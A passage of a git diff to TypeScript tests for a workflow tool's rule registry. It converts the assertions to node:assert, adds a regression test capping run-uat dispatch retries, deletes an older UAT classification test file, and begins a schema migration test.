   test("listRules returns correct fields on each rule", () => {
@@ -95,12 +93,12 @@ describe("RuleRegistry", () => {
     const listed = registry.listRules();
     const rule = listed.find(r => r.name === "check-fields")!;
 
-    assertTrue(rule !== undefined, "rule found by name");
-    assertEq(rule.when, "dispatch", "when field is dispatch");
-    assertEq(rule.evaluation, "first-match", "evaluation is first-match");
-    assertTrue(typeof rule.where === "function", "where is a function");
-    assertTrue(typeof rule.then === "function", "then is a function");
-    assertEq(rule.description, "Mock rule for planning", "description is set");
+    assert.ok(rule !== undefined, "rule found by name");
+    assert.deepStrictEqual(rule.when, "dispatch", "when field is dispatch");
+    assert.deepStrictEqual(rule.evaluation, "first-match", "evaluation is first-match");
+    assert.ok(typeof rule.where === "function", "where is a function");
+    assert.ok(typeof rule.then === "function", "then is a function");
+    assert.deepStrictEqual(rule.description, "Mock rule for planning", "description is set");
   });
 
   test("evaluateDispatch returns first matching rule", async () => {
@@ -113,10 +111,10 @@ describe("RuleRegistry", () => {
     const ctx = makeContext("executing");
     const result = await registry.evaluateDispatch(ctx);
 
-    assertEq(result.action, "dispatch", "result is a dispatch action");
+    assert.deepStrictEqual(result.action, "dispatch", "result is a dispatch action");
     if (result.action === "dispatch") {
-      assertEq(result.unitType, "test-executing", "matched the executing rule");
-      assertEq(result.prompt, "Prompt for executing", "prompt from matched rule");
+      assert.deepStrictEqual(result.unitType, "test-executing", "matched the executing rule");
+      assert.deepStrictEqual(result.prompt, "Prompt for executing", "prompt from matched rule");
     }
   });
 
@@ -128,9 +126,9 @@ describe("RuleRegistry", () => {
     const ctx = makeContext("blocked");
     const result = await registry.evaluateDispatch(ctx);
 
-    assertEq(result.action, "stop", "result is a stop action");
+    assert.deepStrictEqual(result.action, "stop", "result is a stop action");
     if (result.action === "stop") {
-      assertTrue(result.reason.includes("blocked"), "stop reason mentions phase");
+      assert.ok(result.reason.includes("blocked"), "stop reason mentions phase");
     }
   });
 
@@ -159,9 +157,9 @@ describe("RuleRegistry", () => {
     const ctx = makeContext("planning");
     const result = await registry.evaluateDispatch(ctx);
 
-    assertEq(result.action, "dispatch", "async dispatch resolved");
+    assert.deepStrictEqual(result.action, "dispatch", "async dispatch resolved");
     if (result.action === "dispatch") {
-      assertEq(result.unitType, "async-test", "async rule matched");
+      assert.deepStrictEqual(result.unitType, "async-test", "async rule matched");
     }
   });
 
@@ -188,11 +186,11 @@ describe("RuleRegistry", () => {
     // Reset
     registry.resetState();
 
-    assertEq(registry.getActiveHook(), null, "activeHook cleared");
-    assertEq(registry.hookQueue.length, 0, "hookQueue cleared");
-    assertEq(registry.cycleCounts.size, 0, "cycleCounts cleared");
-    assertEq(registry.isRetryPending(), false, "retryPending cleared");
-    assertEq(registry.consumeRetryTrigger(), null, "retryTrigger cleared");
+    assert.deepStrictEqual(registry.getActiveHook(), null, "activeHook cleared");
+    assert.deepStrictEqual(registry.hookQueue.length, 0, "hookQueue cleared");
+    assert.deepStrictEqual(registry.cycleCounts.size, 0, "cycleCounts cleared");
+    assert.deepStrictEqual(registry.isRetryPending(), false, "retryPending cleared");
+    assert.deepStrictEqual(registry.consumeRetryTrigger(), null, "retryTrigger cleared");
   });
 
   test("singleton getRegistry throws when not initialized", () => {
@@ -201,9 +199,9 @@ describe("RuleRegistry", () => {
       getRegistry();
     } catch (e: any) {
       threw = true;
-      assertTrue(e.message.includes("not initialized"), "error mentions not initialized");
+      assert.ok(e.message.includes("not initialized"), "error mentions not initialized");
     }
-    assertTrue(threw, "getRegistry threw");
+    assert.ok(threw, "getRegistry threw");
   });
 
   test("setRegistry / getRegistry round-trips", () => {
@@ -211,20 +209,20 @@ describe("RuleRegistry", () => {
     setRegistry(registry);
 
     const retrieved = getRegistry();
-    assertEq(retrieved, registry, "getRegistry returns the same instance");
+    assert.deepStrictEqual(retrieved, registry, "getRegistry returns the same instance");
 
     const listed = retrieved.listRules().filter(r => r.when === "dispatch");
-    assertEq(listed.length, 1, "singleton has 1 dispatch rule");
-    assertEq(listed[0].name, "singleton-test", "rule name matches");
+    assert.deepStrictEqual(listed.length, 1, "singleton has 1 dispatch rule");
+    assert.deepStrictEqual(listed[0].name, "singleton-test", "rule name matches");
   });
 
   test("initRegistry creates and sets singleton", () => {
     const rules = [mockDispatchRule("init-test", "executing")];
     const registry = initRegistry(rules);
 
-    assertEq(getRegistry(), registry, "initRegistry sets the singleton");
+    assert.deepStrictEqual(getRegistry(), registry, "initRegistry sets the singleton");
     const listed = getRegistry().listRules().filter(r => r.when === "dispatch");
-    assertEq(listed.length, 1, "singleton has the rule");
+    assert.deepStrictEqual(listed.length, 1, "singleton has the rule");
   });
 
   test("evaluateDispatch respects rule order (first match wins)", async () => {
@@ -258,9 +256,9 @@ describe("RuleRegistry", () => {
     const ctx = makeContext("planning");
     const result = await registry.evaluateDispatch(ctx);
 
-    assertEq(result.action, "dispatch", "dispatch action returned");
+    assert.deepStrictEqual(result.action, "dispatch", "dispatch action returned");
     if (result.action === "dispatch") {
-      assertEq(result.unitType, "first-wins", "first rule won over second");
+      assert.deepStrictEqual(result.unitType, "first-wins", "first rule won over second");
     }
   });
 
@@ -268,18 +266,18 @@ describe("RuleRegistry", () => {
 
   test("convertDispatchRules produces correct count of UnifiedRule objects", () => {
     const converted = convertDispatchRules(DISPATCH_RULES);
-    assertEq(converted.length, DISPATCH_RULES.length, `convertDispatchRules produces ${DISPATCH_RULES.length} rules`);
+    assert.deepStrictEqual(converted.length, DISPATCH_RULES.length, `convertDispatchRules produces ${DISPATCH_RULES.length} rules`);
   });
 
   test("each converted rule has correct when, evaluation, and original name", () => {
     const converted = convertDispatchRules(DISPATCH_RULES);
     for (let i = 0; i < converted.length; i++) {
       const rule = converted[i];
-      assertEq(rule.when, "dispatch", `rule ${i} has when:"dispatch"`);
-      assertEq(rule.evaluation, "first-match", `rule ${i} has evaluation:"first-match"`);
-      assertEq(rule.name, DISPATCH_RULES[i].name, `rule ${i} preserves name "${DISPATCH_RULES[i].name}"`);
-      assertTrue(typeof rule.where === "function", `rule ${i} has a where function`);
-      assertTrue(typeof rule.then === "function", `rule ${i} has a then function`);
+      assert.deepStrictEqual(rule.when, "dispatch", `rule ${i} has when:"dispatch"`);
+      assert.deepStrictEqual(rule.evaluation, "first-match", `rule ${i} has evaluation:"first-match"`);
+      assert.deepStrictEqual(rule.name, DISPATCH_RULES[i].name, `rule ${i} preserves name "${DISPATCH_RULES[i].name}"`);
+      assert.ok(typeof rule.where === "function", `rule ${i} has a where function`);
+      assert.ok(typeof rule.then === "function", `rule ${i} has a then function`);
     }
   });
 
@@ -287,7 +285,7 @@ describe("RuleRegistry", () => {
     const converted = convertDispatchRules(DISPATCH_RULES);
     const registry = new RuleRegistry(converted);
     const listed = registry.listRules().filter(r => r.when === "dispatch");
-    assertEq(listed.length, DISPATCH_RULES.length, `listRules returns ${DISPATCH_RULES.length} dispatch rules`);
+    assert.deepStrictEqual(listed.length, DISPATCH_RULES.length, `listRules returns ${DISPATCH_RULES.length} dispatch rules`);
   });
 
   test("rule names from listRules match getDispatchRuleNames in exact order", () => {
@@ -298,9 +296,9 @@ describe("RuleRegistry", () => {
       .map(r => r.name);
     const originalNames = getDispatchRuleNames();
 
-    assertEq(listedNames.length, originalNames.length, "same number of names");
+    assert.deepStrictEqual(listedNames.length, originalNames.length, "same number of names");
     for (let i = 0; i < originalNames.length; i++) {
-      assertEq(listedNames[i], originalNames[i], `name at index ${i} matches: "${originalNames[i]}"`);
+      assert.deepStrictEqual(listedNames[i], originalNames[i], `name at index ${i} matches: "${originalNames[i]}"`);
     }
   });
 
@@ -309,18 +307,18 @@ describe("RuleRegistry", () => {
   test("getOrCreateRegistry lazily creates a registry with empty dispatch rules", () => {
     // After resetRegistry(), getRegistry() would throw. getOrCreateRegistry() should not.
     const registry = getOrCreateRegistry();
-    assertTrue(registry instanceof RuleRegistry, "returns a RuleRegistry instance");
+    assert.ok(registry instanceof RuleRegistry, "returns a RuleRegistry instance");
     const dispatchRules = registry.listRules().filter(r => r.when === "dispatch");
-    assertEq(dispatchRules.length, 0, "lazily-created registry has 0 dispatch rules");
+    assert.deepStrictEqual(dispatchRules.length, 0, "lazily-created registry has 0 dispatch rules");
   });
 
   test("getOrCreateRegistry returns existing registry when initialized", () => {
     const rules = [mockDispatchRule("explicit-init", "planning")];
     const explicit = initRegistry(rules);
     const lazy = getOrCreateRegistry();
-    assertEq(lazy, explicit, "getOrCreateRegistry returns the same singleton as initRegistry");
+    assert.deepStrictEqual(lazy, explicit, "getOrCreateRegistry returns the same singleton as initRegistry");
     const dispatchRules = lazy.listRules().filter(r => r.when === "dispatch");
-    assertEq(dispatchRules.length, 1, "singleton has the explicitly initialized dispatch rule");
+    assert.deepStrictEqual(dispatchRules.length, 1, "singleton has the explicitly initialized dispatch rule");
   });
 
   // ── Hook-derived rules in listRules ────────────────────────────────
@@ -333,9 +331,9 @@ describe("RuleRegistry", () => {
     const preDispatchRules = allRules.filter(r => r.when === "pre-dispatch");
 
     // No preferences file = no hooks
-    assertEq(postUnitRules.length, 0, "no post-unit rules when no hooks configured");
-    assertEq(preDispatchRules.length, 0, "no pre-dispatch rules when no hooks configured");
-    assertEq(allRules.length, DISPATCH_RULES.length, "total rules equals dispatch rules only");
+    assert.deepStrictEqual(postUnitRules.length, 0, "no post-unit rules when no hooks configured");
+    assert.deepStrictEqual(preDispatchRules.length, 0, "no pre-dispatch rules when no hooks configured");
+    assert.deepStrictEqual(allRules.length, DISPATCH_RULES.length, "total rules equals dispatch rules only");
   });
 
   test("listRules dispatch rules appear first, hooks after", () => {
@@ -345,8 +343,8 @@ describe("RuleRegistry", () => {
 
     // Verify dispatch rules come first (indices 0..N-1)
     for (let i = 0; i < converted.length; i++) {
-      assertEq(allRules[i].when, "dispatch", `rule at index ${i} is a dispatch rule`);
-      assertEq(allRules[i].name, converted[i].name, `dispatch rule at index ${i} has correct name`);
+      assert.deepStrictEqual(allRules[i].when, "dispatch", `rule at index ${i} is a dispatch rule`);
+      assert.deepStrictEqual(allRules[i].name, converted[i].name, `dispatch rule at index ${i} has correct name`);
     }
   });
 
@@ -355,34 +353,34 @@ describe("RuleRegistry", () => {
   test("evaluatePostUnit returns null for hook-on-hook prevention", () => {
     const registry = new RuleRegistry([]);
     const result = registry.evaluatePostUnit("hook/code-review", "M001/S01/T01", "/tmp/test");
-    assertEq(result, null, "hook units don't trigger other hooks");
+    assert.deepStrictEqual(result, null, "hook units don't trigger other hooks");
   });
 
   test("evaluatePostUnit returns null for triage-captures", () => {
     const registry = new RuleRegistry([]);
     const result = registry.evaluatePostUnit("triage-captures", "M001/S01/T01", "/tmp/test");
-    assertEq(result, null, "triage-captures skipped");
+    assert.deepStrictEqual(result, null, "triage-captures skipped");
   });
 
   test("evaluatePostUnit returns null for quick-task", () => {
     const registry = new RuleRegistry([]);
     const result = registry.evaluatePostUnit("quick-task", "M001/S01/T01", "/tmp/test");
-    assertEq(result, null, "quick-task skipped");
+    assert.deepStrictEqual(result, null, "quick-task skipped");
   });
 
   test("evaluatePreDispatch bypasses hook units", () => {
     const registry = new RuleRegistry([]);
     const result = registry.evaluatePreDispatch("hook/review", "M001/S01/T01", "prompt", "/tmp/test");
-    assertEq(result.action, "proceed", "hook units always proceed");
-    assertEq(result.prompt, "prompt", "prompt unchanged");
-    assertEq(result.firedHooks.length, 0, "no hooks fired");
+    assert.deepStrictEqual(result.action, "proceed", "hook units always proceed");
+    assert.deepStrictEqual(result.prompt, "prompt", "prompt unchanged");
+    assert.deepStrictEqual(result.firedHooks.length, 0, "no hooks fired");
   });
 
   test("evaluatePreDispatch proceeds with empty hooks", () => {
     const registry = new RuleRegistry([]);
     const result = registry.evaluatePreDispatch("execute-task", "M001/S01/T01", "original prompt", "/tmp/test");
-    assertEq(result.action, "proceed", "proceeds when no hooks");
-    assertEq(result.prompt, "original prompt", "prompt unchanged");
+    assert.deepStrictEqual(result.action, "proceed", "proceeds when no hooks");
+    assert.deepStrictEqual(result.prompt, "original prompt", "prompt unchanged");
   });
 
   // ── matchedRule provenance (S02 journal support) ───────────────────
@@ -395,8 +393,8 @@ describe("RuleRegistry", () => {
     const ctx = makeContext("planning");
     const result = await registry.evaluateDispatch(ctx);
 
-    assertEq(result.action, "dispatch", "result is a dispatch action");
-    assertEq(result.matchedRule, "my-planning-rule", "matchedRule is the rule name");
+    assert.deepStrictEqual(result.action, "dispatch", "result is a dispatch action");
+    assert.deepStrictEqual(result.matchedRule, "my-planning-rule", "matchedRule is the rule name");
   });
 
   test("evaluateDispatch result includes matchedRule '<no-match>' on fallback stop", async () => {
@@ -407,7 +405,7 @@ describe("RuleRegistry", () => {
     const ctx = makeContext("some-unknown-phase");
     const result = await registry.evaluateDispatch(ctx);
 
-    assertEq(result.action, "stop", "result is a stop action");
-    assertEq(result.matchedRule, "<no-match>", "matchedRule is '<no-match>' on fallback");
+    assert.deepStrictEqual(result.action, "stop", "result is a stop action");
+    assert.deepStrictEqual(result.matchedRule, "<no-match>", "matchedRule is '<no-match>' on fallback");
   });
 });
diff --git a/src/resources/extensions/gsd/tests/run-uat-replay-cap.test.ts b/src/resources/extensions/gsd/tests/run-uat-replay-cap.test.ts
new file mode 100644
index 000000000..0d4b80b65
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/run-uat-replay-cap.test.ts
@@ -0,0 +1,51 @@
+/**
+ * Regression test for #3624 — cap run-uat dispatch attempts
+ *
+ * When verification commands fail before writing a verdict, the run-uat
+ * dispatch rule fires repeatedly in an infinite loop. The fix adds a
+ * MAX_UAT_ATTEMPTS constant and calls incrementUatCount before dispatch
+ * to cap the number of attempts.
+ *
+ * Structural verification test — reads source to confirm MAX_UAT_ATTEMPTS
+ * and incrementUatCount exist.
+ */
+
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
+import { readFileSync } from 'node:fs';
+import { fileURLToPath } from 'node:url';
+import { dirname, join } from 'node:path';
+
+const __filename = fileURLToPath(import.meta.url);
+const __dirname = dirname(__filename);
+
+const source = readFileSync(join(__dirname, '..', 'auto-dispatch.ts'), 'utf-8');
+
+describe('run-uat replay cap (#3624)', () => {
+  test('MAX_UAT_ATTEMPTS constant is defined', () => {
+    assert.match(source, /const MAX_UAT_ATTEMPTS\s*=\s*\d+/,
+      'MAX_UAT_ATTEMPTS constant should be defined');
+  });
+
+  test('incrementUatCount function is exported', () => {
+    assert.match(source, /export function incrementUatCount\(/,
+      'incrementUatCount should be an exported function');
+  });
+
+  test('getUatCount function is exported', () => {
+    assert.match(source, /export function getUatCount\(/,
+      'getUatCount should be an exported function');
+  });
+
+  test('incrementUatCount is called before dispatch in rule', () => {
+    // incrementUatCount should be called before the dispatch return
+    const ruleSection = source.slice(source.indexOf('checkNeedsRunUat'));
+    assert.match(ruleSection, /incrementUatCount\(/,
+      'incrementUatCount should be called in the dispatch rule');
+  });
+
+  test('attempts are compared against MAX_UAT_ATTEMPTS', () => {
+    assert.match(source, /attempts\s*>\s*MAX_UAT_ATTEMPTS/,
+      'dispatch should check attempts > MAX_UAT_ATTEMPTS');
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/run-uat.test.ts b/src/resources/extensions/gsd/tests/run-uat.test.ts
deleted file mode 100644
index 9ba481465..000000000
--- a/src/resources/extensions/gsd/tests/run-uat.test.ts
+++ /dev/null
@@ -1,428 +0,0 @@
-// Tests for extractUatType — the core UAT classification primitive — plus
-// prompt template loading and dispatch precondition assertions (via
-// resolveSliceFile / extractUatType on real fixture files).
-//
-// Sections:
-//   (a)–(j)  extractUatType classification (17 assertions from T01)
-//   (k)      run-uat prompt template loading and content integrity (8 assertions)
-//   (l)      dispatch precondition assertions via resolveSliceFile (4 assertions)
-//   (m)      non-artifact UAT skip: human-experience UATs are not dispatched (1 assertion)
-//   (n)      stale replay guard: existing UAT-RESULT never re-dispatches (1 assertion)
-
-import { mkdtempSync, mkdirSync, readFileSync, rmSync, writeFileSync } from 'node:fs';
-import { join, dirname } from 'node:path';
-import { tmpdir } from 'node:os';
-import { fileURLToPath } from 'node:url';
-
-import { extractUatType } from '../files.ts';
-import { resolveSliceFile } from '../paths.ts';
-import { checkNeedsRunUat } from '../auto-prompts.ts';
-import { createTestContext } from './test-helpers.ts';
-
-// ─── Worktree-aware prompt loader ──────────────────────────────────────────
-// Resolves prompts relative to this test file so the worktree copy is used
-// instead of the main checkout copy (matches complete-milestone.test.ts pattern).
-
-const __dirname = dirname(fileURLToPath(import.meta.url));
-const worktreePromptsDir = join(__dirname, '..', 'prompts');
-
-function loadPromptFromWorktree(name: string, vars: Record<string, string> = {}): string {
-  const path = join(worktreePromptsDir, `${name}.md`);
-  let content = readFileSync(path, 'utf-8');
-  const effectiveVars = {
-    skillActivation: 'If no installed skill clearly matches this unit, skip explicit skill activation and continue with the required workflow.',
-    ...vars,
-  };
-  for (const [key, value] of Object.entries(effectiveVars)) {
-    content = content.replaceAll(`{{${key}}}`, value);
-  }
-  return content.trim();
-}
-
-
-const { assertEq, assertTrue, report } = createTestContext();
-// ─── Fixture helpers ───────────────────────────────────────────────────────
-
-function createFixtureBase(): string {
-  const base = mkdtempSync(join(tmpdir(), 'gsd-run-uat-test-'));
-  mkdirSync(join(base, '.gsd', 'milestones'), { recursive: true });
-  return base;
-}
-
-function writeSliceFile(
-  base: string,
-  mid: string,
-  sid: string,
-  suffix: string,
-  content: string,
-): void {
-  const dir = join(base, '.gsd', 'milestones', mid, 'slices', sid);
-  mkdirSync(dir, { recursive: true });
-  writeFileSync(join(dir, `${sid}-${suffix}.md`), content);
-}
-
-function cleanup(base: string): void {
-  rmSync(base, { recursive: true, force: true });
-}
-
-function makeUatContent(mode: string): string {
-  return `# UAT File\n\n## UAT Type\n\n- UAT mode: ${mode}\n- Some other bullet: value\n`;
-}
-
-// ═══════════════════════════════════════════════════════════════════════════
-// Tests
-// ═══════════════════════════════════════════════════════════════════════════
-
-async function main(): Promise<void> {
-
-  // ─── (a) artifact-driven ──────────────────────────────────────────────────
-  console.log('\n── (a) artifact-driven');
-
-  assertEq(
-    extractUatType(makeUatContent('artifact-driven')),
-    'artifact-driven',
-    'plain artifact-driven → artifact-driven',
-  );
-
-  assertEq(
-    extractUatType('## UAT Type\n\n- UAT mode: artifact-driven\n'),
-    'artifact-driven',
-    'minimal content, artifact-driven',
-  );
-
-  // ─── (b) live-runtime ─────────────────────────────────────────────────────
-  console.log('\n── (b) live-runtime');
-
-  assertEq(
-    extractUatType(makeUatContent('live-runtime')),
-    'live-runtime',
-    'plain live-runtime → live-runtime',
-  );
-
-  // ─── (c) human-experience ─────────────────────────────────────────────────
-  console.log('\n── (c) human-experience');
-
-  assertEq(
-    extractUatType(makeUatContent('human-experience')),
-    'human-experience',
-    'plain human-experience → human-experience',
-  );
-
-  // ─── (d) mixed standalone ─────────────────────────────────────────────────
-  console.log('\n── (d) mixed standalone');
-
-  assertEq(
-    extractUatType(makeUatContent('mixed')),
-    'mixed',
-    'plain mixed → mixed',
-  );
-
-  // ─── (e) mixed with parenthetical ─────────────────────────────────────────
-  console.log('\n── (e) mixed parenthetical');
-
-  assertEq(
-    extractUatType(makeUatContent('mixed (artifact-driven + live-runtime)')),
-    'mixed',
-    'mixed (artifact-driven + live-runtime) → mixed (leading keyword only)',
-  );
-
-  assertEq(
-    extractUatType(makeUatContent('mixed (some other description)')),
-    'mixed',
-    'mixed with arbitrary parenthetical → mixed',
-  );
-
-  // ─── (f) missing ## UAT Type section ──────────────────────────────────────
-  console.log('\n── (f) missing UAT Type section');
-
-  assertEq(
-    extractUatType('# UAT File\n\n## Overview\n\nSome content.\n'),
-    undefined,
-    'no ## UAT Type section → undefined',
-  );
-
-  assertEq(
-    extractUatType(''),
-    undefined,
-    'empty content → undefined',
-  );
-
-  // ─── (g) ## UAT Type present but no UAT mode: bullet ─────────────────────
-  console.log('\n── (g) UAT Type section present, no UAT mode: bullet');
-
-  assertEq(
-    extractUatType('## UAT Type\n\n- Some other bullet: value\n- Another bullet\n'),
-    undefined,
-    'section present but no UAT mode: bullet → undefined',
-  );
-
-  assertEq(
-    extractUatType('## UAT Type\n\n'),
-    undefined,
-    'section present but empty → undefined',
-  );
-
-  // ─── (h) unknown keyword ──────────────────────────────────────────────────
-  console.log('\n── (h) unknown keyword');
-
-  assertEq(
-    extractUatType(makeUatContent('automated')),
-    undefined,
-    'unknown keyword automated → undefined',
-  );
-
-  assertEq(
-    extractUatType(makeUatContent('fully-automated')),
-    undefined,
-    'unknown keyword fully-automated → undefined',
-  );
-
-  // ─── (i) extra whitespace around value ────────────────────────────────────
-  console.log('\n── (i) extra whitespace');
-
-  assertEq(
-    extractUatType('## UAT Type\n\n- UAT mode:   artifact-driven   \n'),
-    'artifact-driven',
-    'leading/trailing whitespace around value → still classified correctly',
-  );
-
-  assertEq(
-    extractUatType('## UAT Type\n\n- UAT mode:  mixed (artifact-driven + live-runtime)  \n'),
-    'mixed',
-    'whitespace around mixed parenthetical → mixed',
-  );
-
-  // ─── (j) case sensitivity ─────────────────────────────────────────────────
-  console.log('\n── (j) case sensitivity');
-
-  assertEq(
-    extractUatType(makeUatContent('Artifact-Driven')),
-    'artifact-driven',
-    'Artifact-Driven (title case) → artifact-driven (function lowercases before matching)',
-  );
-
-  assertEq(
-    extractUatType(makeUatContent('MIXED')),
-    'mixed',
-    'MIXED (upper case) → mixed (function lowercases before matching)',
-  );
-
-  // ─── (k) prompt template loading and content integrity ────────────────────
-  console.log('\n── (k) run-uat prompt template');
-
-  const milestoneId = 'M001';
-  const sliceId = 'S01';
-  const uatPath = '.gsd/milestones/M001/slices/S01/S01-UAT.md';
-  const uatResultPath = '.gsd/milestones/M001/slices/S01/S01-UAT-RESULT.md';
-  const uatType = 'live-runtime';
-  const inlinedContext = '<!-- no context -->';
-
-  let promptResult: string | undefined;
-  let promptThrew = false;
-  try {
-    promptResult = loadPromptFromWorktree('run-uat', {
-      workingDirectory: '/tmp/test-project',
-      milestoneId,
-      sliceId,
-      uatPath,
-      uatResultPath,
-      uatType,
-      inlinedContext,
-    });
-  } catch {
-    promptThrew = true;
-  }
-
-  assertTrue(!promptThrew, 'loadPromptFromWorktree("run-uat", vars) does not throw');
-  assertTrue(
-    typeof promptResult === 'string' && promptResult.length > 0,
-    'run-uat prompt result is a non-empty string',
-  );
-  assertTrue(
-    promptResult?.includes(milestoneId) ?? false,
-    `prompt contains milestoneId value "${milestoneId}" after substitution`,
-  );
-  assertTrue(
-    promptResult?.includes(sliceId) ?? false,
-    `prompt contains sliceId value "${sliceId}" after substitution`,
-  );
-  assertTrue(
-    promptResult?.includes(uatResultPath) ?? false,
-    `prompt contains uatResultPath value after substitution`,
-  );
-  assertTrue(
-    promptResult?.includes(`Detected UAT mode:** \`${uatType}\``) ?? false,
-    `prompt contains detected dynamic uatType value "${uatType}" after substitution`,
-  );
-  assertTrue(
-    promptResult?.includes(`uatType: ${uatType}`) ?? false,
-    `prompt contains dynamic uatType frontmatter value "${uatType}" after substitution`,
-  );
-  assertTrue(
-    !/\{\{[^}]+\}\}/.test(promptResult ?? ''),
-    'no unreplaced {{...}} tokens remain after variable substitution',
-  );
-  assertTrue(
-    /browser|runtime|execute|run/i.test(promptResult ?? ''),
-    'prompt contains runtime execution language (browser/runtime/execute/run)',
-  );
-  assertTrue(
-    !/surfaced for human review/i.test(promptResult ?? ''),
-    'prompt does not contain "surfaced for human review" (non-artifact UATs are skipped, not dispatched)',
-  );
-
-  // ─── (l) dispatch precondition assertions via resolveSliceFile ────────────
-  console.log('\n── (l) dispatch preconditions via resolveSliceFile');
-
-  // State A: UAT file exists, UAT-RESULT file does NOT — triggers dispatch
-  {
-    const base = createFixtureBase();
-    const uatContent = makeUatContent('artifact-driven');
-    try {
-      writeSliceFile(base, 'M001', 'S01', 'UAT', uatContent);
-
-      const uatFilePath = resolveSliceFile(base, 'M001', 'S01', 'UAT');
-      assertTrue(
-        uatFilePath !== null,
-        'resolveSliceFile(..., "UAT") returns non-null when UAT file exists (dispatch trigger state)',
-      );
-
-      const uatResultFilePath = resolveSliceFile(base, 'M001', 'S01', 'UAT-RESULT');
-      assertEq(
-        uatResultFilePath,
-        null,
-        'resolveSliceFile(..., "UAT-RESULT") returns null when result file missing (dispatch trigger state)',
-      );
-
-      // End-to-end: file content → parse → classify
-      const rawContent = readFileSync(uatFilePath!, 'utf-8');
-      assertEq(
-        extractUatType(rawContent),
-        'artifact-driven',
-        'extractUatType on fixture UAT file returns expected type (end-to-end data flow)',
-      );
-    } finally {
-      cleanup(base);
-    }
-  }
-
-  // State B: UAT-RESULT file exists — dispatch is skipped (idempotent)
-  {
-    const base = createFixtureBase();
-    try {
-      writeSliceFile(base, 'M001', 'S01', 'UAT', makeUatContent('artifact-driven'));
-      writeSliceFile(base, 'M001', 'S01', 'UAT-RESULT', '# UAT Result\n\nverdict: PASS\n');
-
-      const uatResultFilePath = resolveSliceFile(base, 'M001', 'S01', 'UAT-RESULT');
-      assertTrue(
-        uatResultFilePath !== null,
-        'resolveSliceFile(..., "UAT-RESULT") returns non-null when result file exists (idempotent skip state)',
-      );
-    } finally {
-      cleanup(base);
-    }
-  }
-
-  // ─── (m) non-artifact UATs are skipped (not dispatched) ─────────────────
-  console.log('\n── (m) non-artifact UAT skip');
-
-  {
-    const base = createFixtureBase();
-    try {
-      const roadmapDir = join(base, '.gsd', 'milestones', 'M001');
-      mkdirSync(roadmapDir, { recursive: true });
-      writeFileSync(
-        join(roadmapDir, 'M001-ROADMAP.md'),
-        [
-          '# M001: Test roadmap',
-          '',
-          '## Slices',
-          '',
-          '- [x] **S01: First slice** `risk:low` `depends:[]`',
-          '- [ ] **S02: Next slice** `risk:low` `depends:[S01]`',
-          '',
-          '## Boundary Map',
-          '',
-        ].join('\n'),
-      );
-
-      // human-experience UAT still dispatches, but auto-mode later pauses for manual review
-      writeSliceFile(base, 'M001', 'S01', 'UAT', makeUatContent('human-experience'));
-
-      const state = {
-        activeMilestone: { id: 'M001', title: 'Test roadmap' },
-        activeSlice: { id: 'S02', title: 'Next slice' },
-        activeTask: null,
-        phase: 'planning',
-        recentDecisions: [],
-        blockers: [],
-        nextAction: 'Plan S02',
-        registry: [],
-      } as const;
-
-      const result = await checkNeedsRunUat(base, 'M001', state as any, { uat_dispatch: true } as any);
-      assertEq(
-        result,
-        { sliceId: 'S01', uatType: 'human-experience' },
-        'human-experience UAT dispatches so auto-mode can pause for manual review',
-      );
-    } finally {
-      cleanup(base);
-    }
-  }
-
-  // ─── (n) existing UAT-RESULT never re-dispatches ──────────────────────
-  console.log('\n── (n) stale replay guard');
-
-  {
-    const base = createFixtureBase();
-    try {
-      const roadmapDir = join(base, '.gsd', 'milestones', 'M001');
-      mkdirSync(roadmapDir, { recursive: true });
-      writeFileSync(
-        join(roadmapDir, 'M001-ROADMAP.md'),
-        [
-          '# M001: Test roadmap',
-          '',
-          '## Slices',
-          '',
-          '- [x] **S01: First slice** `risk:low` `depends:[]`',
-          '- [ ] **S02: Next slice** `risk:low` `depends:[S01]`',
-          '',
-          '## Boundary Map',
-          '',
-        ].join('\n'),
-      );
-
-      writeSliceFile(base, 'M001', 'S01', 'UAT', makeUatContent('artifact-driven'));
-      writeSliceFile(base, 'M001', 'S01', 'UAT-RESULT', '---\nverdict: FAIL\n---\n');
-
-      const state = {
-        activeMilestone: { id: 'M001', title: 'Test roadmap' },
-        activeSlice: { id: 'S02', title: 'Next slice' },
-        activeTask: null,
-        phase: 'planning',
-        recentDecisions: [],
-        blockers: [],
-        nextAction: 'Plan S02',
-        registry: [],
-      } as const;
-
-      const result = await checkNeedsRunUat(base, 'M001', state as any, { uat_dispatch: true } as any);
-      assertEq(
-        result,
-        null,
-        'existing UAT-RESULT with FAIL verdict does not re-dispatch; verdict gate owns blocking',
-      );
-    } finally {
-      cleanup(base);
-    }
-  }
-
-  report();
-}
-
-main().catch((error) => {
-  console.error(error);
-  process.exit(1);
-});
diff --git a/src/resources/extensions/gsd/tests/schema-v9-sequence.test.ts b/src/resources/extensions/gsd/tests/schema-v9-sequence.test.ts
new file mode 100644
index 000000000..44010ae15
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/schema-v9-sequence.test.ts
@@ -0,0 +1,176 @@
+import test from 'node:test';
+import assert from 'node:assert/strict';
+import { mkdtempSync, rmSync } from 'node:fs';
+import { join } from 'node:path';
+import { tmpdir } from 'node:os';
+
+import {
+  openDatabase,
+  closeDatabase,
+  insertMilestone,
+  insertSlice,
+  insertTask,
+  getMilestoneSlices,
+  getSliceTasks,
+  getActiveSliceFromDb,
+  getActiveTaskFromDb,
+} from '../gsd-db.ts';
+
+function makeTmp(): string {
+  return mkdtempSync(join(tmpdir(), 'gsd-v9-'));
+}
+
+function cleanup(base: string): void {
+  try { closeDatabase(); } catch { /* noop */ }
+  try { rmSync(base, { recursive: true, force: true }); } catch { /* noop */ }
+}
+
+test('schema v9: migration adds sequence column to slices and tasks', () => {
+  const base = makeTmp();
+  const dbPath = join(base, 'gsd.db');
+  openDatabase(dbPath);
+  try {
+    insertMilestone({ id: 'M001', title: 'Test', status: 'active' });
+    // If sequence column doesn't exist, these would throw
+    insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Slice 1', sequence: 5 });
+    insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', title: 'Task 1', sequence: 3 });
+
+    const slices = getMilestoneSlices('M001');
+    assert.equal(slices.length, 1);
+    assert.equal(slices[0]!.sequence, 5);
+
+    const tasks = getSliceTasks('M001', 'S01');
+    assert.equal(tasks.length, 1);
+    assert.equal(tasks[0]!.sequence, 3);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('schema v9: getMilestoneSlices returns slices ordered by sequence then id', () => {
+  const base = makeTmp();
